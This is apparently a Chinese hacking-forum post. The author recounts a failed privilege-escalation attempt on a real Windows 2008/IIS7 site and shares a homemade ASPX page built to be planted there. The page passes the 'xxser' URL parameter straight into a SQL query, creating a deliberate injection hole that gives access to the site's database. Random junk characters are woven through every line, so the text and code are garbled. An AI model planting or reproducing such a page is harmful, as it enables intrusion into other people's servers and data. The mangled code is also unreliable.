昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。1 Q5 l( L& ]4 M5 a; J4 J
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。% f- M$ O2 ~/ ?0 f) X: r# x( B7 \0 E
代码量不多,自己写个拉倒了。烦死了。: u# Y8 B3 \3 @% z
& ]; ^ }$ L5 a8 _
$ Y3 a2 E: I b<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
. p" V( c5 Q2 \ {& R) c5 n3 r<html xmlns="http://www.w3.org/1999/xhtml">
/ [6 A2 Y5 x6 u# q5 d<head runat="server">
: T5 S# {7 D8 k/ d <title>暗影aspx构造注射专用页面</title>
, {5 I1 _3 q: ~</head>
- K3 \9 { \( K! j<body>
5 f5 h6 i7 x" \1 w% R <form id="form1" runat="server">' y" ~* D4 Z; p% m \1 v
<div>% o. g: @7 H9 Q
<script language="c#" runat="server">
. {' u7 E* x, N- {+ S ! X0 V0 @& k4 x2 w: s; E6 P
void page_init(object sender, EventArgs e)- ^7 D1 u% m( r6 Q
{* ^% T3 P' t" W% u. q
0 I# O Z( y* Z: ?
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();9 k" `. q) |4 b" x3 g: ]' W/ c
( a3 C; J8 } d0 n3 @" J) `: G conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
! F6 l8 q8 N; j* G$ r2 e conn.Open();4 \1 Z5 h f7 I
3 r; t; ~9 E, c# y: m w string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
! |: K. J+ r/ O5 _+ u; s + ?- k4 ~. l, r8 H
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
+ j& m% Z, U% N" U* S9 x1 G int x = command.ExecuteNonQuery();) h2 O5 g9 d: n( ?( H/ }$ i
Response.Write(i+"\n");
. u+ ^- V& H/ ^% x6 ~: | Response.Write(x);
8 @' k- i6 a# N b% u conn.Close();
) D- Y4 Y5 M5 S" R# N4 G) h }
4 C5 `' \5 D( W2 C. `
+ o4 r. D/ n0 l" H: h </script>& \4 J+ ~# y( p m b/ B
</div>
3 j7 t( y2 Z1 y* d8 \ </form>
5 s' Q( a0 B* k' D% }</body>( l2 h/ z: f9 h
</html>. r6 H2 y. h1 Y$ F! Q5 j
|